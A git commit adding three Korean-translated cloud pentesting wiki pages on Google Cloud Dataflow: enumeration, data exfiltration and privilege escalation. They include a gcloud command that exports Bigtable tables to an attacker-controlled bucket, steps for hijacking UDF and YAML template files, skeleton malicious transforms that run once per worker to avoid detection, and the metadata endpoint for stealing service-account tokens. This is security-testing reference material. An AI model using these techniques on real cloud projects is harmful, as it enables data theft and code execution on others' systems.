Translated ['src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp

2026-03-12 21:22:57 -07:00 · 2026-02-16 11:12:34 +00:00
parent 7929a65217
commit ed86acbf6f
3 changed files with 306 additions and 0 deletions
--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md
@@ -0,0 +1,53 @@
+# GCP - Dataflow 사후 침투
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Dataflow
+
+Dataflow에 대한 자세한 정보는 다음을 확인하세요:
+
+{{#ref}}
+../gcp-services/gcp-dataflow-enum.md
+{{#endref}}
+
+### Dataflow를 사용하여 다른 서비스의 데이터를 유출하는 방법
+
+**권한:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs` (소스 및 싱크에 접근 권한이 있는 SA에 대해)
+
+Dataflow 작업 생성 권한이 있으면 GCP Dataflow 템플릿을 사용해 Bigtable, BigQuery, Pub/Sub 등에서 데이터를 공격자가 제어하는 GCS 버킷으로 내보낼 수 있습니다. 이는 Dataflow 접근 권한을 얻었을 때 강력한 사후 침투 기법입니다 — 예: [Dataflow Rider](../gcp-privilege-escalation/gcp-dataflow-privesc.md) 권한 상승 (버킷 쓰기를 통한 파이프라인 탈취).
+
+> [!NOTE]
+> 충분한 권한으로 소스를 읽고 싱크에 쓰기 가능한 서비스 계정에 대해 `iam.serviceAccounts.actAs` 권한이 필요합니다. 명시하지 않으면 기본적으로 Compute Engine default SA가 사용됩니다.
+
+#### Bigtable to GCS
+
+전체 패턴은 [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md#dump-rows-to-your-bucket) — "Dump rows to your bucket"을 참조하세요. 템플릿: `Cloud_Bigtable_to_GCS_Json`, `Cloud_Bigtable_to_GCS_Parquet`, `Cloud_Bigtable_to_GCS_SequenceFile`.
+
+<details>
+
+<summary>공격자가 제어하는 버킷으로 Bigtable 내보내기</summary>
+```bash
+gcloud dataflow jobs run <job-name> \
+--gcs-location=gs://dataflow-templates-us-<REGION>/<VERSION>/Cloud_Bigtable_to_GCS_Json \
+--project=<PROJECT> \
+--region=<REGION> \
+--parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE_ID>,bigtableTableId=<TABLE_ID>,filenamePrefix=<PREFIX>,outputDirectory=gs://<YOUR_BUCKET>/raw-json/ \
+--staging-location=gs://<YOUR_BUCKET>/staging/
+```
+</details>
+
+#### BigQuery to GCS
+
+Dataflow 템플릿을 사용하면 BigQuery 데이터를 내보낼 수 있습니다. 대상 포맷(JSON, Avro 등)에 맞는 템플릿을 사용하고 출력 경로를 여러분의 버킷으로 지정하세요.
+
+#### Pub/Sub and streaming sources
+
+스트리밍 파이프라인은 Pub/Sub(또는 다른 소스)에서 읽어 GCS로 쓸 수 있습니다. 대상 Pub/Sub 구독을 읽어 여러분이 제어하는 버킷으로 쓰는 템플릿으로 작업을 실행하세요.
+
+## 참고 자료
+
+- [Dataflow templates](https://cloud.google.com/dataflow/docs/guides/templates/provided-templates)
+- [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions)
+- [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md)
+
+{{#include ../../../banners/hacktricks-training.md}}
--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md
@@ -0,0 +1,172 @@
+# GCP - Dataflow Privilege Escalation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Dataflow
+
+{{#ref}}
+../gcp-services/gcp-dataflow-enum.md
+{{#endref}}
+
+### `storage.objects.create`, `storage.objects.get`, `storage.objects.update`
+
+Dataflow는 GCS에 저장된 UDFs 및 job template YAML의 무결성을 검증하지 않습니다.
+버킷에 대한 쓰기 권한이 있으면 이러한 파일을 덮어써서 코드 주입, 워커에서의 코드 실행, 서비스 계정 토큰 탈취 또는 데이터 처리 변경이 가능합니다.
+배치 및 스트리밍 파이프라인 작업 모두 이 공격의 대상이 될 수 있습니다. 파이프라인에서 이 공격을 실행하려면 작업이 실행되기 전에, 작업 워커가 생성되기 전 초기 몇 분 동안(또는 autoscaling으로 인해 새로운 워커가 스핀업되기 전 작업이 실행되는 동안) UDFs/templates를 교체해야 합니다.
+
+**Attack vectors:**
+- **UDF hijacking:** 파이프라인에서 참조되고 고객 관리 버킷에 저장된 Python (`.py`) 및 JS (`.js`) UDFs
+- **Job template hijacking:** 고객 관리 버킷에 저장된 커스텀 YAML 파이프라인 정의
+
+
+> [!WARNING]
+> **Run-once-per-worker trick:** Dataflow UDFs 및 template callables는 **per row/line** 단위로 호출됩니다. 조율 없이 exfiltration 또는 token theft를 시도하면 수천 번 실행되어 노이즈, rate limiting 및 탐지를 유발합니다. **file-based coordination** 패턴을 사용하세요: 시작 시 마커 파일(예: `/tmp/pwnd.txt`)의 존재를 확인하고, 존재하면 악성 코드를 건너뛰며, 존재하지 않으면 페이로드를 실행하고 파일을 생성합니다. 이렇게 하면 페이로드는 **once per worker**로 실행되고, per line으로 여러 번 실행되는 것을 방지합니다.
+
+
+#### Direct exploitation via gcloud CLI
+
+1. Enumerate Dataflow jobs and locate the template/UDF GCS paths:
+
+<details>
+
+<summary>작업을 나열하고 describe로 template 경로, staging 위치, 및 UDF 참조를 확인</summary>
+```bash
+# List jobs (optionally filter by region)
+gcloud dataflow jobs list --region=<region>
+gcloud dataflow jobs list --project=<PROJECT_ID>
+
+# Describe a job to get template GCS path, staging location, and any UDF/template references
+gcloud dataflow jobs describe <JOB_ID> --region=<region> --full --format="yaml"
+# Look for: currentState, createTime, jobMetadata, type (JOB_TYPE_STREAMING or JOB_TYPE_BATCH)
+# Pipeline options often include: tempLocation, stagingLocation, templateLocation, or flexTemplateGcsPath
+```
+</details>
+
+2. GCS에서 원본 UDF 또는 작업 템플릿을 다운로드합니다:
+
+<details>
+
+<summary>버킷에서 UDF 파일 또는 YAML 템플릿 다운로드</summary>
+```bash
+# If job references a UDF at gs://bucket/path/to/udf.py
+gcloud storage cp gs://<BUCKET>/<PATH>/<udf_file>.py ./udf_original.py
+
+# Or for a YAML job template
+gcloud storage cp gs://<BUCKET>/<PATH>/<template>.yaml ./template_original.yaml
+```
+</details>
+
+3. 파일을 로컬에서 편집: 악성 페이로드를 주입(아래 Python UDF 또는 YAML 스니펫 참조)하고 run-once coordination pattern이 사용되도록 확인하세요.
+
+4. 원본 파일을 덮어쓰도록 다시 업로드:
+
+<details>
+
+<summary>버킷에서 UDF 또는 템플릿 덮어쓰기</summary>
+```bash
+gcloud storage cp ./udf_injected.py gs://<BUCKET>/<PATH>/<udf_file>.py
+
+# Or for YAML
+gcloud storage cp ./template_injected.yaml gs://<BUCKET>/<PATH>/<template>.yaml
+```
+</details>
+
+5. 다음 작업 실행을 기다리거나, (스트리밍의 경우) 오토스케일링을 트리거하세요(예: 파이프라인 입력을 범람시켜) 그러면 새로운 워커가 시작되어 수정된 파일을 가져옵니다.
+
+#### Python UDF injection
+
+워커가 데이터를 당신의 C2 서버로 exfiltrate하게 하려면 `urllib.request`를 사용하고 `requests`를 사용하지 마세요. `requests`는 classic Dataflow workers에 사전 설치되어 있지 않습니다.
+
+<details>
+
+<summary>Malicious UDF with run-once coordination and metadata extraction</summary>
+```python
+import os
+import json
+import urllib.request
+from datetime import datetime
+
+def _malicious_func():
+# File-based coordination: run once per worker.
+coordination_file = "/tmp/pwnd.txt"
+if os.path.exists(coordination_file):
+return
+
+# malicous code goes here
+with open(coordination_file, "w", encoding="utf-8") as f:
+f.write("done")
+
+def transform(line):
+# Malicous code entry point - runs per line but coordination ensures once per worker
+try:
+_malicious_func()
+except Exception:
+pass
+# ... original UDF logic follows ...
+```
+</details>
+
+
+#### Job template YAML injection
+
+조정 파일을 사용하는 callable을 포함하는 `MapToFields` 스텝을 주입하세요. YAML 기반 파이프라인에서 `requests`를 지원한다면 템플릿이 `dependencies: [requests]`를 선언한 경우 `requests`를 사용하고, 그렇지 않으면 `urllib.request`를 사용하세요.
+
+파이프라인이 대상에 유효한 데이터를 계속 쓰도록 정리 단계(`drop: [malicious_step]`)를 추가하세요.
+
+<details>
+
+<summary>파이프라인 YAML의 악의적 `MapToFields` 스텝 및 정리</summary>
+```yaml
+- name: MaliciousTransform
+type: MapToFields
+input: Transform
+config:
+language: python
+fields:
+malicious_step:
+callable: |
+def extract_and_return(row):
+import os
+import json
+from datetime import datetime
+coordination_file = "/tmp/pwnd.txt"
+if os.path.exists(coordination_file):
+return True
+try:
+import urllib.request
+# malicious code goes here
+with open(coordination_file, "w", encoding="utf-8") as f:
+f.write("done")
+except Exception:
+pass
+return True
+append: true
+- name: CleanupTransform
+type: MapToFields
+input: MaliciousTransform
+config:
+fields: {}
+append: true
+drop:
+- malicious_step
+```
+</details>
+
+### Compute Engine의 Dataflow Workers 접근 권한
+
+**권한:** `compute.instances.osLogin` 또는 `compute.instances.osAdminLogin` (`worker SA`에 대해 `iam.serviceAccounts.actAs` 권한과 함께), 또는 `compute.instances.setMetadata` / `compute.projects.setCommonInstanceMetadata` (`iam.serviceAccounts.actAs` 권한과 함께) — 레거시 SSH 키 주입의 경우
+
+Dataflow workers는 Compute Engine VM으로 실행됩니다. OS Login 또는 SSH를 통해 worker에 접근하면 메타데이터 엔드포인트(`http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token`)에서 SA 토큰을 읽거나, 데이터를 조작하거나 임의의 코드를 실행할 수 있습니다.
+
+악용 세부사항은 다음을 참조하세요:
+- [GCP - Compute Privesc](gcp-compute-privesc/README.md) — `compute.instances.osLogin`, `compute.instances.osAdminLogin`, `compute.instances.setMetadata`
+
+## 참고자료
+
+- [Dataflow Rider: How Attackers can Abuse Shadow Resources in Google Cloud Dataflow](https://www.varonis.com/blog/dataflow-rider)
+- [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions)
+- [gcloud dataflow jobs describe](https://cloud.google.com/sdk/gcloud/reference/dataflow/jobs/describe)
+- [Apache Beam YAML: User-defined functions](https://beam.apache.org/documentation/sdks/yaml-udf/)
+- [Apache Beam YAML Transform Reference](https://beam.apache.org/releases/yamldoc/current/)
+
+{{#include ../../../banners/hacktricks-training.md}}
--- a/src/pentesting-cloud/gcp-security/gcp-services/gcp-dataflow-enum.md
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-dataflow-enum.md
@@ -0,0 +1,81 @@
+# GCP - Dataflow 열거
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## 기본 정보
+
+**Google Cloud Dataflow**는 **배치 및 스트리밍 데이터 처리**를 위한 완전관리형 서비스입니다. 조직이 Cloud Storage, BigQuery, Pub/Sub, Bigtable과 통합하여 대규모 데이터를 변환하고 분석하는 파이프라인을 구축할 수 있게 합니다. Dataflow 파이프라인은 프로젝트의 worker VMs에서 실행되며; 템플릿과 User-Defined Functions (UDFs)은 종종 GCS 버킷에 저장됩니다. [Learn more](https://cloud.google.com/dataflow).
+
+## 구성 요소
+
+Dataflow 파이프라인은 일반적으로 다음을 포함합니다:
+
+**Template:** GCS에 저장된 파이프라인 구조와 단계를 정의하는 YAML 또는 JSON 정의(및 flex templates의 경우 Python/Java 코드).
+
+**Launcher (Flex Templates):** 짧게 실행되는 Compute Engine 인스턴스가 Flex Template 실행 시 템플릿을 검증하고 작업 실행 전에 컨테이너를 준비하는 데 사용될 수 있습니다.
+
+**Workers:** 템플릿에서 UDFs와 명령을 가져와 실제 데이터 처리 작업을 수행하는 Compute Engine VM입니다.
+
+**Staging/Temp buckets:** 임시 파이프라인 데이터, 작업 아티팩트, UDF 파일, flex template 메타데이터(`.json`)를 저장하는 GCS 버킷입니다.
+
+## 배치 vs 스트리밍 작업
+
+Dataflow는 두 가지 실행 모드를 지원합니다:
+
+**Batch jobs:** 고정된 유한 데이터셋을 처리합니다(예: 로그 파일, 테이블 내보내기). 작업은 한 번 실행되어 완료되면 종료됩니다. 작업 기간 동안 워커가 생성되고 완료되면 종료됩니다. Batch jobs는 일반적으로 ETL, 과거 분석, 또는 예약된 데이터 마이그레이션에 사용됩니다.
+
+**Streaming jobs:** 무한하고 지속적으로 도착하는 데이터를 처리합니다(예: Pub/Sub 메시지, 실시간 센서 피드). 작업은 명시적으로 중지될 때까지 실행됩니다. 워커는 확장/축소될 수 있으며; autoscaling으로 인해 새로운 워커가 생성될 수 있고, 시작 시 GCS에서 파이프라인 구성요소(templates, UDFs)를 가져옵니다.
+
+## 열거
+
+Dataflow 작업 및 관련 리소스를 열거하여 서비스 계정, 템플릿 경로, 스테이징 버킷, UDF 위치 등을 수집할 수 있습니다.
+
+### 작업 열거
+
+Dataflow 작업을 열거하고 세부 정보를 가져오려면:
+```bash
+# List Dataflow jobs in the project
+gcloud dataflow jobs list
+# List Dataflow jobs (by region)
+gcloud dataflow jobs list --region=<region>
+
+# Describe job (includes service account, template GCS path, staging location, parameters)
+gcloud dataflow jobs describe <job-id> --region=<region>
+```
+### 템플릿 및 Bucket 열거
+
+작업 설명은 template GCS path, staging location 및 worker service account를 노출합니다—파이프라인 구성 요소를 저장하는 buckets를 식별하는 데 유용합니다.
+
+작업 설명에 참조된 Buckets는 flex templates, UDFs 또는 YAML pipeline definitions을 포함할 수 있습니다:
+```bash
+# List objects in a bucket (look for .json flex templates, .py UDFs, .yaml pipeline defs)
+gcloud storage ls gs://<bucket>/
+
+# List objects recursively
+gcloud storage ls gs://<bucket>/**
+```
+## Privilege Escalation
+
+{{#ref}}
+../gcp-privilege-escalation/gcp-dataflow-privesc.md
+{{#endref}}
+
+## Post Exploitation
+
+{{#ref}}
+../gcp-post-exploitation/gcp-dataflow-post-exploitation.md
+{{#endref}}
+
+## Persistence
+
+{{#ref}}
+../gcp-persistence/gcp-dataflow-persistence.md
+{{#endref}}
+
+## 참고자료
+
+- [Dataflow overview](https://cloud.google.com/dataflow)
+- [Pipeline workflow execution in Dataflow](https://cloud.google.com/dataflow/docs/guides/pipeline-workflows)
+- [Troubleshoot templates](https://cloud.google.com/dataflow/docs/guides/troubleshoot-templates)
+
+{{#include ../../../banners/hacktricks-training.md}}